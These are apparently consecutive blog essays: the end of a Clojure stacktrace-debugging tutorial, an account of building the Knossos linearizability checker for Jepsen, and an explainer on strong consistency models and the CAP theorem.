That’s why we see control flow through clojure.core$partial$fn__4228 (an anonymous function defined inside clojure.core/partial) on the way to frame.

Caused by: java.lang.ClassCastException: clojure.lang.PersistentArrayMap cannot be cast to java.lang.Number at clojure.lang.Numbers.multiply(Numbers.java:146) at clojure.lang.Numbers.multiply(Numbers.java:3659) at scratch.debugging$frame.invoke(debugging.clj:26) at clojure.lang.AFn.applyToHelper(AFn.java:156) at clojure.lang.AFn.applyTo(AFn.java:144) at clojure.core$apply.invoke(core.clj:626) at clojure.core$partial$fn__4228.doInvoke(core.clj:2468)

And there’s our suspect! scratch.debugging/frame, at line 26. To return to that line again:

(let [margin (* 2 rect)]

* is a multiplication, and 2 is obviously a number, but rectrect is a map here. Aha! We meant to multiply the mat-width by two, not the rectangle.

(defn frame "Given a mat width, and a photo rectangle, figure out the size of the frame required by adding the mat width around all edges of the photo." [mat-width rect] (let [margin (* 2 mat-width)] {:x (+ margin (:x rect)) :y (+ margin (:y rect))}))

I believe we’ve fixed the bug, then. Let’s give it a shot!

The unbearable lightness of nil

There’s one more bug lurking in this program. This one’s stacktrace is short.

user=> (use 'scratch.debugging :reload) CompilerException java.lang.NullPointerException, compiling:(scratch/debugging.clj:73:23) user=> (pst) CompilerException java.lang.NullPointerException, compiling:(scratch/debugging.clj:73:23) clojure.lang.Compiler.load (Compiler.java:7142) clojure.lang.RT.loadResourceScript (RT.java:370) clojure.lang.RT.loadResourceScript (RT.java:361) clojure.lang.RT.load (RT.java:440) clojure.lang.RT.load (RT.java:411) clojure.core/load/fn--5066 (core.clj:5641) clojure.core/load (core.clj:5640) clojure.core/load-one (core.clj:5446) clojure.core/load-lib/fn--5015 (core.clj:5486) clojure.core/load-lib (core.clj:5485) clojure.core/apply (core.clj:626) clojure.core/load-libs (core.clj:5524) Caused by: NullPointerException clojure.lang.Numbers.ops (Numbers.java:961) clojure.lang.Numbers.add (Numbers.java:126) clojure.core/+ (core.clj:951) clojure.core.protocols/fn--6086 (protocols.clj:143) clojure.core.protocols/fn--6057/G--6052--6066 (protocols.clj:19) clojure.core.protocols/seq-reduce (protocols.clj:27) clojure.core.protocols/fn--6078 (protocols.clj:53) clojure.core.protocols/fn--6031/G--6026--6044 (protocols.clj:13) clojure.core/reduce (core.clj:6287) scratch.debugging/total-wood (debugging.clj:69) scratch.debugging/eval1560 (debugging.clj:81) clojure.lang.Compiler.eval (Compiler.java:6703)

On line 69, total-wood calls reduce, which dives through a series of functions from clojure.core.protocols before emerging in +: the function we passed to reduce. Reduce is trying to combine two elements from its collection of wood segments using +, but one of them was nil. Clojure calls this a NullPointerException. In total-wood, we constructed the sequence of segments this way:

(let [segments (->> photos ; Convert photos to frame dimensions (map (partial frame mat-width)) ; Convert frames to segments (mapcat perimeter))] ; Now, take segments (->> segments ; Add the spares (concat (spares segments)) ; Include a cut between each segment (interpose cut-size) ; And sum the whole shebang. (reduce +))))

Where did the nil value come from? The stacktrace doesn’t say, because the sequence reduce is traversing didn’t have any problem producing the nil. reduce asked for a value and the sequence happily produced a nil. We only had a problem when it came time to combine the nil with the next value, using +.

A stacktrace like this is something like a murder mystery: we know the program died in the reducer, that it was shot with a +, and the bullet was a nil–but we don’t know where the bullet came from. The trail runs cold. We need more forensic information–more hints about the nil’s origin–to find the culprit.

Again, this is a class of error largely preventable with static type systems. If you have worked with a statically typed language in the past, it may be interesting to consider that almost every Clojure function takes Option[A] and does something more-or-less sensible, returning Option[B]. Whether the error propagates as a nil or an Option, there can be similar difficulties in localizing the cause of the problem.

Let’s try printing out the state as reduce goes along:

(->> segments ; Add the spares (concat (spares segments)) ; Include a cut between each segment (interpose cut-size) ; And sum the whole shebang. (reduce (fn [acc x] (prn acc x) (+ acc x)))))) user=> (use 'scratch.debugging :reload) 12 1 13 14 27 1 28 nil CompilerException java.lang.NullPointerException, compiling:(scratch/debugging.clj:73:56)

Not every value is nil! There’s a 14 there which looks like a plausible segment for a frame, and two one-inch buffers from cut-size. We can rule out interpose because it inserts a 1 every time, and that 1 reduces correctly. But where’s that nil coming from? Is from segments or (spares segments)?

(let [segments (->> photos ; Convert photos to frame dimensions (map (partial frame mat-width)) ; Convert frames to segments (mapcat perimeter))] (prn :segments segments) user=> (use 'scratch.debugging :reload) :segments (12 14 nil 14 14 12 nil 12 24 34 nil 34)

It is present in segments. Let’s trace it backwards through the sequence’s creation. It’d be handy to have a function like prn that returned its input, so we could spy on values as they flowed through the ->> macro.

(defn spy [& args] (apply prn args) (last args)) (let [segments (->> photos ; Convert photos to frame dimensions (map (partial frame mat-width)) (spy :frames) ; Convert frames to segments (mapcat perimeter))] user=> (use 'scratch.debugging :reload) :frames ({:x 12, :y 14} {:x 14, :y 12} {:x 24, :y 34}) :segments (12 14 nil 14 14 12 nil 12 24 34 nil 34)

Ah! So the frames are intact, but the perimeters are bad. Let’s check the perimeter function:

(defn perimeter "Given a rectangle, returns a vector of its edge lengths." [rect] [(:x rect) (:y rect) (:z rect) (:y rect)])

Spot the typo? We wrote :z instead of :x. Since the frame didn’t have a :z field, it returned nil! That’s the origin of our NullPointerException. With the bug fixed, we can re-run and find:

user=> (use 'scratch.debugging :reload) total inches: 319

Whallah!

Recap

As we solve more and more problems, we get faster at debugging–at skipping over irrelevant log data, figuring out exactly what input was at fault, knowing what terms to search for, and developing a network of peers and mentors to ask for help. But when we encounter unexpected bugs, it can help to fall back on a family of problem-solving tactics.

We explore the problem thoroughly, localizing it to a particular function, variable, or set of inputs. We identify the boundaries of the problem, carving away parts of the system that work as expected. We develop new notation, maps, and diagrams of the problem space, precisely characterizing it in a variety of modes.

With the problem identified, we search for extant solutions–or related problems others have solved in the past. We trawl through issue trackers, mailing list posts, blogs, and forums like Stackoverflow, or, for more theoretical problems, academic papers, Mathworld, and Wikipedia, etc. If searching reveals nothing, we try rephrasing the problem, relaxing the constraints, adding debugging statements, and solving smaller subproblems. When all else fails, we ask for help from our peers, or from the community in IRC, mailing lists, and so on, or just take a break.

We learned to explore Clojure stacktraces as a trail into our programs, leading to the place where an error occurred. But not all paths are linear, and we saw how lazy operations and higher-order functions create inversions and intermediate layers in the stacktrace. Then we learned how to debug values that were distant from the trace, by adding logging statements and working our way closer to the origin.

Programming languages and us, their users, are engaged in a continual dialogue. We may speak more formally, verbosely, with many types and defensive assertions–or we may speak quickly, generally, in fuzzy terms. The more precise we are with the specifications of our program’s types, the more the program can assist us when things go wrong. Conversely, those specifications harden our programs into strong but rigid forms, and rigid structures are harder to bend into new shapes.

In Clojure we strike a more dynamic balance: we speak in generalities, but we pay for that flexibility. Our errors are harder to trace to their origins. While the Clojure compiler can warn us of some errors, like mis-spelled variable names, it cannot (without a library like core.typed) tell us when we have incorrectly assumed an object will be of a certain type. Even very rigid languages, like Haskell, cannot identify some errors, like reversing the arguments to a subtraction function. Some tests are always necessary, though types are a huge boon.

No matter what language we write in, we use a balance of types and tests to validate our assumptions, both when the program is compiled and when it is run.

The errors that arise in compilation or runtime aren’t rebukes so much as hints. Don’t despair! They point the way towards understanding one’s program in more detail–though the errors may be cryptic. Over time we get better at reading our language’s errors and making our programs more robust.

Earlier versions of Jepsen found glaring inconsistencies, but missed subtle ones. In particular, Jepsen was not well equipped to distinguish linearizable systems from sequentially or causally consistent ones. When people asked me to analyze systems which claimed to be linearizable, Jepsen could rule out obvious classes of behavior, like dropping writes, but couldn’t tell us much more than that. Since users and vendors are starting to rely on Jepsen as a basic check on correctness, it’s important that Jepsen be able to identify true linearization errors.

etcd-jepsen-set-test.jpg

To understand why Jepsen was not a complete test of linearizability, we have to understand the structure of its original tests. Jepsen assumed, originally, that every system could be modeled as a set of integers. Each client would gradually add a sequence of integers–disjoint from all the other client sets–to the database’s set; then perform a final read. If any elements which had supposedly succeeded were missing, we know the system dropped data.

The original Jepsen tests were designed for AP systems, like Riak, without a linear order; using a set is appropriate because its contents are fundamentally unordered, and because addition to the set is associative and idempotent. To test a linearizable system, we implement set addition by performing a compare-and-set, replacing the old set with the current value plus the number being written. If a given CAS was successful, then that element should appear in the final read.

This does verify sequential consistency, and to varying degrees linearizability, but has limited power. The database may choose, for instance, to delay the visibility of changes, so long as they become visible before the final read. We can’t test operations other than a CAS. We can’t, for instance, test deletions. It’s also not clear how to verify systems like mutexes, queues, or semaphores.

Furthermore, if a test does fail, it’s not clear why. A missing number from the final set might be caused by a problem with that particular CAS–or a CAS executed hours later which happened to destroy the effects of a preceding write. Ideally, we’d like to know exactly why the system failed to linearize. With this in mind, I set out to design a linearizability checker suitable for analyzing both formal models and real software with no internal visibility.

Knossos

In the introduction to Knossos, I couched Knossos as a model checker, motivated by a particular algorithm discussed on the Redis mailing list. This was slightly disingenuous: in fact, I designed Knossos as a model checker for any type of history, including those recorded from real databases. This means that Jepsen can generate a series of random operations, execute them against a database, and verify that the resulting history is valid with respect to some model.

Given a sequence of operations that a database might go through–say, two processes attempting to acquire a mutex:

{:process 1, :type :invoke, :f :acquire, :value nil} {:process 2, :type :invoke, :f :acquire, :value nil} {:process 1, :type :ok, :f :acquire, :value nil} {:process 2, :type :fail :f :acquire, :value "lock failed; already held"}

… and a singlethreaded model of the system, like

(defrecord Mutex [locked?] Model (step [mutex op] (condp = (:f op) :acquire (if locked? (inconsistent "already held") (Mutex. true)) :release (if locked? (Mutex. false) (inconsistent "not held")))))

… Knossos can identify if the given concurrent history linearizes–that is, whether there exists some equivalent history in which every operation appears to take place atomically, in a well-defined order, between the invocation and completion times.

jepsen-model.jpg

Linearizability, like sequential and serializable consistency, requires that every operation take place in some specific order; that there appears to be only one “true” state for the system at any given time. Therefore we can model any linearizable system as a single state, plus a function, called step, which applies an operation to that state and returns a new state.

In Clojure, we represent this model with a simple protocol, called Model, which defines a function (step current-model-state operation), and returns the new state. In our mutex example, there are four possibilities, depending on whether the operation is :acquire or :release, and whether the state locked? is true. If we try to lock an unlocked mutex, we return a new Mutex with the state true. If we try to lock a mutex which is already locked, we return a special kind of state: an inconsistent state.

Inconsistent states allow us to verify that a singlethreaded history is valid. We simply (reduce step initial-state operations); if the the result is inconsistent, we know that sequence of operations was prohibited by the model. The model formally expresses our definition of the allowable causal histories.

The plot thickens

jepsen-histories.jpg

But we don’t have a singlethreaded history to test. We have a multithreaded history, with any number of operations in play concurrently. Each client is invoking, waiting for, and then discovering the result of its operations. Our history contains pairs of :invoke, :ok messages, when an operation succeeds, or :invoke, :fail when the operation is known to not have taken place, or :invoke, :info, when we simply don’t know what happened.

If an operation times out, or the server returns an indeterminate response, we may never find out whether the operation really took place. In the history to the right, process 5 has hung and will never recover. Its operation could take place at any time, even years into the future. In general, a hung process is concurrent with every other subsequent operation.

jepsen-invalid-history.jpg
jepsen-valid-history.jpg

Given a model, we know how to test if a particular sequence of operations is valid. But in a concurrent history, the ordering is ambiguous; each operation could take place at any time between its invocation and completion. One possible interleaving might be read 1, write 1, read 2, write 2, which is obviously incorrect. On the other hand, we could evaluate write 1, read 1, write 2, read 2 instead–which is a valid history for a register. This history is linearizable–but in order to prove that fact, we have to find a particular valid order.

Imagine something like a game of hopscotch: one must land on each cell in turn, always moving from left to right, finding a path in which the model’s constraints hold. Where there are many cells at the same time, finding a path becomes especially difficult. We must consider every possible permutation of those concurrent cells, which is O(n!). That’s the kind of hopscotch that, even when played by computer, makes one re-evaluate one’s life choices.

So what do we do, presented with a huge space of possibilities?

Exploit degeneracy

I’m a degenerate sort of person, so my first inclination is to look for symmetries in the state space. The key observation to make is that whether a given operation is valid or not depends solely on the current state of the model, not its history.

step(state, op) -> state'
jepsen-degeneracy.jpg

It doesn’t matter how we got to the state; if you give me two registers containing the value 2, and ask me to apply the same operation to both, we only need to check one of the registers, because the results will be equivalent!

Unlike a formal model-checker or proof assistant, Knossos doesn’t know the structure of the system it’s analyzing; it can’t perform symmetry reduction based on the definition of step. What we can do, however, is look for cases where we come back to the same state and the same future series of operations–and when that occurs, drop all but one of the cases immediately–and this turns out to be equivalent to a certain class of symmetry reduction. In particular, we can compact interchangeable orders like concurrent reads, or writes that lead to the same value, etc. We keep a cache of visited worlds and avoid exploring any that have been seen before.

Laziness

monads.jpg
jepsen-laziness.jpg

Remember, we’re looking for any linearization, not all of them. If we can find a shortcut by not evaluating some highly-branching history, by not taking some expensive path, we can skip huge parts of the search. Like a lightning bolt feeling its way down the path of least resistance, we evaluate only those paths which seem easiest–coming back to the hard ones later. If the history is truly not linearizable, we’re forced to return to those expensive branches and check them, but if the history is valid, we can finish as soon as a single path is found.

Lazy evaluation is all about making control flow explicit instead of implicit. We use a data structure to describe where to explore next, instead of following the normal program flow. In Knossos, we represent the exploration of a particular order of operations as a world, which sits at some index along the multithreaded history. Each world carries with it a fixed history–the specific order of operations that occurred in that possible universe. The fixed history leads to a current model state. Finally, each world has a set of pending operations: operations that have been invoked, but have not yet taken effect.

For example, a world might have a fixed history of lock, unlock, lock, leading to a model state where locked is true, and a second lock attempt might be pending but not yet applied. An unlock operation could arrive and allow the pending lock to take place.

By representing the entire state of the computation as a data structure, we can write a single function that takes a world and explores it, returning a set of potential future worlds. We can explore those worlds in parallel.

Parallelization

pmap.jpg
jepsen-parallelize.jpg

Because our states are immutable representations of the computation, and the function we use to explore any given state is pure and deterministic, we can trivially parallelize the exploration process. Early versions of Knossos reduced over each operation in the history, applying that operation to every outstanding world by whacking it with a parallel map.

This parallelization strategy has a serious drawback, though: by exploring the state space one index at a time, we effectively perform a breadth-first search. We want to take shortcuts through the state space; running many searches at once. We don’t just want depth-first, either; instead, we want to explore those worlds which have the lowest branching factor, because those worlds are the cheapest to explore.

So instead of exploring the history one operation at a time, we spawn lots of threads and have each consume from a priority queue of worlds, ranked by how awful those worlds are to explore. As each explorer thread discovers new consequent worlds, it inserts them back into the pool. If any thread finds a world that encompasses every operation in the history, we’ve demonstrated the history is linearizable.

We pay some cost in synchronization: queues aren’t cheap, and the java.util.concurrent.BlockingPriorityQueue has some particularly nasty contention costs for both enqueues and dequeues. Luckily, the queue will usually contain plenty of elements, so we can stripe the queue into several subqueues, each with thread affinity. Affinity for each queue reduces lock contention, which dramatically reduces the time threads spend waiting to enqueue or dequeue worlds. When a thread exhausts its local queue, it steals worlds from its neighbors.

This approach costs us some degree of memory locality: transferring records through the queue tends to push them out of the CPU cache. We can tune how far each explorer thread will take a particular world to reduce the locality cost: if work is too chunky, threads can starve awaiting worlds to explore–but if work is too fine-grained, synchronization and cache misses dominate.

Memoization

Making control flow explicit (some might even say monadic) allows us to memoize computation as well. At RICON East, in 2013, Margo Seltzer gave a phenomenal talk on automatically parallelizing singlethreaded x86 programs. She pointed out that x86 can be thought of as a very large, very complicated, function that transforms a bit-vector of all the registers and all of memory into some subsequent state–depending on the instruction pointer, contents of registers, etc. It’s a very large value, but if you compress it and make even some modest predictions you can cache the results of computations that haven’t even happened yet, allowing the program to jump forward when it encounters a known state.

jepsen-memoization.jpg

This works because parallel programs usually don’t change the entire memory space; they often read and write only a small portion of memory. for(i = 0; i < 100; i++) { arr[i]++ }, for instance, independently increments each number in arr. In that sense, the memory space is degenerate outside each particular element. That degeneracy allows speculative execution to have a chance of predicting an equivalent future state of the program: we can increment each number concurrently.

In Knossos we have a similarly degenerate state space; all fixed histories may be collapsed so long as the model and pending operations are identical. We also have a speculative and lazy execution strategy: operations are simultaneously explored at various points in the multiverse. Hence we can apply a similar memoization strategy: by caching visited worlds, we can avoid exploring equivalent paths twice.

In fact we don’t even need to store the results of the exploration, simply that we have reached that world. Think of exploring a maze with several friends, all looking for a path through. When anyone reaches a dead end, they can save time for everyone by coloring in the path they took. When someone comes to a branch in the maze, they only take the paths that nobody has colored in. We simply abort any exploration of a world equivalent to one already visited. This optimization is nondeterministic but synchronization-free, allowing memoization checks to be extremely cheap. Even though cache hitrates are typically low, each hit prunes an exponential number of descendant worlds, dramatically reducing runtimes.

Immutability and performance

haskell.jpg

When we explore a world, we’ll typically encounter many branching paths. Given two concurrent writes a and b, we need to explore [], [a], [b], [a b], and [b a], and in turn, each of those worlds will fork into hundreds, then thousands, then millions of consequent worlds. We have to make a lot of copies.

At this point in the essay, Haskell enthusiasts are nodding their heads sagely and muttering things about Coyoneda diffeomorphisms and trendofunctors. Haskell offers excellent support for immutable data structures and parallel execution of pure functions, which would make it an ideal choice for building this kind of checker.

zahn.jpg

But I am, sadly, not a Haskell wizard. When you get right down to it, I’m more of a Clojure Sith Lord. And as it turns out, this is a type of problem that Clojure is also well-suited for. We express the consistency model as a pure function over immutable models, and use Clojure’s immutable maps, vectors, and sets to store the state of each world, its histories, its pending operations, and so on. Forking the world into distinct paths doesn’t require copying the entire state; rather, Clojure uses a reference to the original data structure, and stores a delta on top. We can fork millions of worlds cheaply.

Because worlds are immutable, we can share them freely between threads. Because the functions that explore a world, returning subsequent possible worlds, are pure, we can explore worlds on any thread, at any time, and take advantage of memoization. But in order to execute that search process in parallel, we need that priority queue of worlds-at-the-edge: a fundamentally mutable data structure. The memoizing cache is also mutable: it must be, to share state between threads. We also need some book-keeping state: how far has the algorithm explored; have we reached the end; how large is the cache.

So as a layer atop the immutable core, we make limited use of mutable structures: a striped java.util.concurrent.PriorityQueue for keeping track of which worlds are up next, a concurrent hashmap to memoize results, Clojure’s atoms for bookkeeping, and some java.util.concurrent.atomic references for primitive CAS. Because this code is wildly nondeterministic, it’s the most difficult portion of Knossos to reason about and debug–yet that nondeterminism is a critical degree of freedom for parallel execution. By broadening the space of allowable execution orders, we reduce the need for inter-core synchronization.

deathstar.jpg

Reducing synchronization is especially important because while I was working on Knossos, Comcast offered me a research grant specifically for Jepsen. As one does when offered unlimited resources by a galactic empire, I thought big.

I used Comcast’s grant to build a 24-core (48 HT) Xeon with 128GB of ECC; effectively demolishing the parallelism and heap barriers that limited earlier verification efforts. Extensive profiling with Yourkit (another great supporter of open-source projects) helped reduce lock and CAS contention which limited scalability to ~4 cores; a few weeks work removed almost all thread stalls and improved performance by two orders of magnitude.

The result is that Knossos can check 5-process, 150–200-element histories in a matter of minutes, not days–and it can do it on 48 cores.

cpus.png

There are several optimizations I haven’t made yet; for instance, detecting crashed processes and optimistically inserting a world in which that crashed process' operation never takes place. However, Knossos at this stage is more than capable of detecting linearization errors in real-world histories.

Proud of this technological terror I’d constructed, I consulted the small Moff Tarkin that lives in my head on what database to test next. “You would prefer another target? An open-source target? Then name the distributed system!”

alderaan.jpg

RabbitMQ. They’re on RabbitMQ.”

Network partitions are going to happen. Switches, NICs, host hardware, operating systems, disks, virtualization layers, and language runtimes, not to mention program semantics themselves, all conspire to delay, drop, duplicate, or reorder our messages. In an uncertain world, we want our software to maintain some sense of intuitive correctness.

Well, obviously we want intuitive correctness. Do The Right Thing™! But what exactly is the right thing? How might we describe it? In this essay, we’ll take a tour of some “strong” consistency models, and see how they fit together.

Correctness

There are many ways to express an algorithm’s abstract behavior–but just for now, let’s say that a system is comprised of a state, and some operations that transform that state. As the system runs, it moves from state to state through some history of operations.

uniprocessor-history.jpg

For instance, our state might be a variable, and the operations on the state could be the writes to, and reads from, that variable. In this simple Ruby program, we write and read a variable several times, printing it to the screen to illustrate the reads.

x = "a"; puts x; puts x x = "b"; puts x x = "c" x = "d"; puts x

We already have an intuitive model of this program’s correctness: it should print “aabd”. Why? Because each of the statements happen in order. First we write the value a, then read the value a, then read the value a, then write the value b, and so on.

Once we set a variable to some value, like a, reading it should return a, until we change the value again. Reading a variable returns the most recently written value. We call this kind of system–a variable with a single value–a register.

We’ve had this model drilled into our heads from the first day we started writing programs, so it feels like second nature–but this is not the only way variables could work. A variable could return any value for a read: a, d, or the moon. If that happened, we’d say the system was incorrect, because those operations don’t align with our model of how variables are supposed to work.

This hints at a definition of correctness for a system: given some rules which relate the operations and state, the history of operations in the system should always follow those rules. We call those rules a consistency model.

We phrased our rules for registers as simple English statements, but they could be arbitrarily complicated mathematical structures. “A read returns the value from two writes ago, plus three, except when the value is four, in which case the read may return either cat or dog” is a consistency model. As is “Every read always returns zero”. We could even say “There are no rules at all; every operation is permitted”. That’s the easiest consistency model to satisfy; every system obeys it trivially.

More formally, we say that a consistency model is the set of all allowed histories of operations. If we run a program and it goes through a sequence of operations in the allowed set, that particular execution is consistent. If the program screws up occasionally and goes through a history not in the consistency model, we say the history was inconsistent. If every possible execution falls into the allowed set, the system satisfies the model. We want real systems to satisfy “intuitively correct” consistency models, so that we can write predictable programs.

Concurrent histories

Now imagine a concurrent program, like one written in Node.js or Erlang. There are multiple logical threads of control, which we term “processes”. If we run a concurrent program with two processes, each of which works with the same register, our earlier register invariant could be violated.

multiprocessor-history.jpg

There are two processes at work here: call them “top” and “bottom”. The top process tries to write a, read, read. The bottom process, meanwhile, tries to read, write b, read. Because the program is concurrent, the operations from these two processes could interleave in more than one order–so long as the operations for a single process happen in the order that process specifies. In this particular case, top writes a, bottom reads a, top reads a, bottom writes b, top reads b, and bottom reads b.

In this light, the concept of concurrency takes on a different shape. We might imagine every program as concurrent by default–when executed, operations could happen in any order. A thread, a process–in the logical sense, anyway–is a constraint over the history: operations belonging to the same thread must take place in order. Logical threads impose a partial order over the allowed operations.

Even with that order, our register invariant–from the point of view of an individual process–no longer holds. The process on top wrote a, read a, then read b–which is not the value it wrote. We must relax our consistency model to usefully describe concurrency. Now, a process is allowed to read the most recently written value from any process, not just itself. The register becomes a place of coordination between two processes; they share state.

Light cones

lightcone-history.jpg

Howerver, this is not the full story: in almost every real-world system, processes are distant from each other. An uncached value in memory, for instance, is likely on a DIMM thirty centimeters away from the CPU. It takes light over a full nanosecond to travel that distance–and real memory accesses are much slower. A value on a computer in a different datacenter could be thousands of kilometers–hundreds of milliseconds–away. We just can’t send information there any faster; physics, thus far, forbids it.

This means our operations are no longer instantaneous. Some of them might be so fast as to be negligible, but in full generality, operations take time. We invoke a write of a variable; the write travels to memory, or another computer, or the moon; the memory changes state; a confirmation travels back; and then we know the operation took place.

concurrent-read.jpg

The delay in sending messages from one place to another implies ambiguity in the history of operations. If messages travel faster or slower, they could take place in unexpected orders. Here, the bottom process invokes a read when the value is a. While the read is in flight, the top process writes b–and by happenstance, its write arrives before the read. The bottom process finally completes its read and finds b, not a.

This history violates our concurrent register consistency model. The bottom process did not read the current value at the time it invoked the read. We might try to use the completion time, rather than the invocation time, as the “true time” of the operation, but this fails by symmetry as well; if the read arrives before the write, the process would receive a when the current value is b.

In a distributed system–one in which it takes time for an operation to take place–we must relax our consistency model again; allowing these ambiguous orders to happen.

How far must we go? Must we allow all orderings? Or can we still impose some sanity on the world?

Linearizability

finite-concurrency-bounds.jpg

On careful examination, there are some bounds on the order of events. We can’t send a message back in time, so the earliest a message could reach the source of truth is, well, instantly. An operation cannot take effect before its invocation.

Likewise, the message informing the process that its operation completed cannot travel back in time, which means that no operation may take effect after its completion.

If we assume that there is a single global state that each process talks to; if we assume that operations on that state take place atomically, without stepping on each other’s toes; then we can rule out a great many histories indeed. We know that each operation appears to take effect atomically at some point between its invocation and completion.

We call this consistency model linearizability; because although operations are concurrent, and take time, there is some place–or the appearance of a place–where every operation happens in a nice linear order.

linearizability-complete-visibility.jpg

The “single global state” doesn’t have to be a single node; nor do operations actually have to be atomic. The state could be split across many machines, or take place in multiple steps–so long as the external history, from the point of view of the processes, appears equivalent to an atomic, single point of state. Often, a linearizable system is made up of smaller coordinating processes, each of which is itself linearizable; and those processes are made up of carefully coordinated smaller processes, and so on, down to linearizable operations provided by the hardware.

Linearizability has powerful consequences. Once an operation is complete, everyone must see it–or some later state. We know this to be true because each operation must take place before its completion time, and any operation invoked subsequently must take place after the invocation–and by extension, after the original operation itself. Once we successfully write b, every subsequently invoked read must see b–or some later value, if more writes occur.

We can use the atomic constraint of linearizability to mutate state safely. We can define an operation like compare-and-set, in which we set the value of a register to a new value if, and only if, the register currently has some other value. We can use compare-and-set as the basis for mutexes, semaphores, channels, counters, lists, sets, maps, trees–all kinds of shared data structures become available. Linearizability guarantees us the safe interleaving of changes.

Moreover, linearizability’s time bounds guarantee that those changes will be visible to other participants after the operation completes. Hence, linearizability prohibits stale reads. Each read will see some current state between invocation and completion; but not a state prior to the read. It also prohibits non-monotonic reads–in which one reads a new value, then an old one.

Because of these strong constraints, linearizable systems are easier to reason about–which is why they’re chosen as the basis for many concurrent programming constructs. All variables in Javascript are (independently) linearizable; as are volatile variables in Java, atoms in Clojure, or individual processes in Erlang. Most languages have mutexes and semaphores; these are linearizable too. Strong assumptions yield strong guarantees.

But what happens if we can’t satisfy those assumptions?

Sequential consistency

sequential-history.jpg

If we allow processes to skew in time, such that their operations can take effect before invocation, or after completion–but retain the constraint that operations from any given process must take place in that process' order–we get a weaker flavor of consistency: sequential consistency.

Sequential consistency allows more histories than linearizability–but it’s still a useful model: one that we use every day. When a user uploads a video to YouTube, for instance, YouTube puts that video into a queue for processing, then returns a web page for the video right away. We can’t actually watch the video at that point; the video upload takes effect a few minutes later, when it’s been fully processed. Queues remove synchronous behavior while (depending on the queue) preserving order.

Many caches also behave like sequentially consistent systems. If I write a tweet on Twitter, or post to Facebook, it takes time to percolate through layers of caching systems. Different users will see my message at different times–but each user will see my operations in order. Once seen, a post shouldn’t disappear. If I write multiple comments, they’ll become visible sequentially, not out of order.

Causal consistency

We don’t have to enforce the order of every operation from a process. Perhaps, only causally related operations must occur in order. We might say, for instance, that all comments on a blog post must appear in the same order for everyone, and insist that any reply be visible to a process only after the post it replies to is visible. If we encode those causal relationships like “I depend on operation X” as an explicit part of each operation, the database can delay making operations visible until it has all the operation’s dependencies.

This is weaker than ordering every operation from the same process–operations from the same process with independent causal chains could execute in any relative order–but prevents many unintuitive behaviors.

Serializable consistency

serializable-history.jpg

If we say that the history of operations is equivalent to one that took place in some single atomic order–but say nothing about the invocation and completion times–we obtain a consistency model known as serializability. This model is both much stronger and much weaker than you’d expect.

Serializability is weak, in the sense that it permits many types of histories, because it places no bounds on time or order. In the diagram to the right, it’s as if messages could be sent arbitrarily far into the past or future, that causal lines are allowed to cross. In a serializable database, a transaction like read x is always allowed to execute at time 0, when x had not yet been initialized. Or it might be delayed infinitely far into the future! The transaction write 2 to x could execute right now, or it could be delayed until the end of time, never appearing to occur.

For instance, in a serializable system, the program

x = 1 x = x + 1 puts x

is allowed to print nil, 1, or 2; because the operations can take place in any order. This is a surprisingly weak constraint! Here, we assume that each line represents a single operation and that all operations succeed.

On the other hand, serializability is strong, in the sense that it prohibits large classes of histories, because it demands a linear order. The program

print x if x = 3 x = 1 if x = nil x = 2 if x = 1 x = 3 if x = 2

can only be ordered in one way. It doesn’t happen in the same order we wrote, but it will reliably change x from nil -> 1 -> 2 -> 3, and finally print 3.

Because serializability allows arbitrary reordering of operations (so long as the order appears atomic), it is not particularly useful in real applications. Most databases which claim to provide serializability actually provide strong serializability, which has the same time bounds as linearizability. To complicate matters further, what most SQL databases term the SERIALIZABLE consistency level actually means something weaker, like repeatable read, cursor stability, or snapshot isolation.

Consistency comes with costs

We’ve said that “weak” consistency models allow more histories than “strong” consistency models. Linearizability, for example, guarantees that operations take place between the invocation and completion times. However, imposing order requires coordination. Speaking loosely, the more histories we exclude, the more careful and communicative the participants in a system must be.

You may have heard of the CAP theorem, which states that given consistency, availability, and partition tolerance, any given system may guarantee at most two of those properties. While Eric Brewer’s CAP conjecture was phrased in these informal terms, the CAP theorem has very precise definitions:

  1. Consistency means linearizability, and in particular, a linearizable register. Registers are equivalent to other systems, including sets, lists, maps, relational databases, and so on, so the theorem can be extended to cover all kinds of linearizable systems.

  2. Availability means that every request to a non-failing node must complete successfully. Since network partitions are allowed to last arbitrarily long, this means that nodes cannot simply defer responding until after the partition heals.

  3. Partition tolerance means that partitions can happen. Providing consistency and availability when the network is reliable is easy. Providing both when the network is not reliable is provably impossible. If your network is not perfectly reliable–and it isn’t–you cannot choose CA. This means that all practical distributed systems on commodity hardware can guarantee, at maximum, either AP or CP.

family-tree.jpg

“Hang on!” you might exclaim. “Linearizability is not the end-all-be-all of consistency models! I could work around the CAP theorem by providing sequential consistency, or serializability, or snapshot isolation!”

This is true; the CAP theorem only says that we cannot build totally available linearizable systems. The problem is that we have other proofs which tell us that you cannot build totally available systems with sequential, serializable, repeatable read, snapshot isolation, or cursor stability–or any models stronger than those. In this map from Peter Bailis' HAT not CAP paper, models shaded in red cannot be fully available.

If we relax our notion of availability, such that client nodes must always talk to the same server, some types of consistency become achievable. We can provide causal consistency, PRAM, and read-your-writes consistency.

If we demand total availability, then we can provide monotonic reads, monotonic writes, read committed, monotonic atomic view, and so on. These are the consistency models provided by distributed stores like Riak and Cassandra, or ANSI SQL databases on the lower isolation settings. These consistency models don’t have linear orders like the diagrams we’ve drawn before; instead, they provide partial orders which come together in a patchwork or web. The orders are partial because they admit a broader class of histories.

A hybrid approach

weak-not-unsafe.jpg

Some algorithms depend on linearizability for safety. If we want to build a distributed lock service, for instance, linearizability is required; without hard time boundaries, we could hold a lock from the future or from the past. On the other hand, many algorithms don’t need linearizability. Eventually consistent sets, lists, trees, and maps, for instance, can be safely expressed as CRDTs even in “weak” consistency models.

Stronger consistency models also tend to require more coordination–more messages back and forth–to ensure their operations occur in the correct order. Not only are they less available, but they can also impose higher latency constraints. This is why modern CPU memory models are not linearizable by default–unless you explicitly say so, modern CPUs will reorder memory operations relative to other cores, or worse. While more difficult to reason about, the performance benefits are phenomenal. Geographically distributed systems, with hundreds of milliseconds of latency between datacenters, often make similar tradeoffs.

